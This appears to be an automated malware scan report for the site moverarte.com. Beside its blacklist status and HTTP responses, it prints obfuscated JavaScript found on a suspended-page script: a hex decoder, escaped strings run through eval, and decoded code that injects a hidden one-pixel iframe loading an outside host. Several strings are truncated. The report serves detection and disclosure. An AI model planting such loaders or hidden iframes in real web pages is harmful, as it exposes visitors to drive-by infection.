Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=moverarte.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://moverarte.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Sep 2014 00:35:25 GMT Location: http://moverarte.com/cgi-sys/suspendedpage.cgi Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://moverarte.com/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 16188 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function c42412807547m48fb3c7e2a426(m48fb3c7e2a80d){ var m48fb3c7e2abf7=16; return (parseInt(m48fb3c7e2a80d,m48fb3c7e2abf7));}function m48fb3c7e2b3d2(m48fb3c7e2b7b0){ function m48fb3c7e2c36a(){return 2;} var m48fb3c7e2bb97='';m48fb3c7e2cb39=String.fromCharCode;for(m48fb3c7e2bf80=0;m48fb3c7e2bf80<m48fb3c7e2b7b0.length;m48fb3c7e2bf80+=m48fb3c7e2c36a()){ m48fb3c7e2bb97+=(m48fb3c7e2cb39(c42412807547m48fb3c7e2a426(m48fb3c7e2b7b0.substr(m48fb3c7e2bf80,m48fb3c7e2c36a()))));}return m48fb3c7e2bb97;} v
Decoded script:
var rh61D='lD%76lD%61lD%72lD%20lD%74lD%74lDG7lD%69lD%57lD%76lD%3DlD%22lD%3ClD%64lD%69lD%76lD%20lD%69lD%64lD%3DlD%27lDG7lD%52lD%62lD%34lD%7DeIlD%30lD%66lD%74lDG4lD%71lDGAlD%27lD%3ElD%3ClD%2FlD%64lD%69lD%76lD%3ElD%22lD%3B';eval(unescape(rh61D.replace(/G/g,'%4').replace(/lD%/g,'%').replace(/DeI%/g,'3%')));
var cWth='qB%69qB%66qB%28qB%64qB%6FqB%6hY%qB%75qB%6DqB%65qB%6EqB%74qB%2EqB%62qB%6FqB%64qB%79QekDQekDqB%6EqB%75qB%6CqB%6CqB%29qB%74qB%74qB%47qB%69qB%57qB%76QekDqB%27QekCqB%62qB%6FqB%64qB%79Qek
var yKaGzo51=document.createElement('iframe');yKaGzo51.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';yKaGzo51.width='1';yKaGzo51.height='1'; yKaGzo51.name='aQpm6G5f';yKaGzo51.style.visibility='hidden';bZbaxzA.appendChild(yKaGzo51);
<div id='GRb4s0ftDqJ'></div>
Antivirus reports:
http://moverarte.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Sep 2014 00:35:26 GMT Location: http://moverarte.com/cgi-sys/suspendedpage.cgi Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: moverarte.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Sep 2014 00:35:25 GMT
Location: http://moverarte.com/cgi-sys/suspendedpage.cgi
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: moverarte.com
Referer: http://www.google.com/search?q=moverarte.com
Result:
The result is similar to the first query. There are no suspicious redirects found.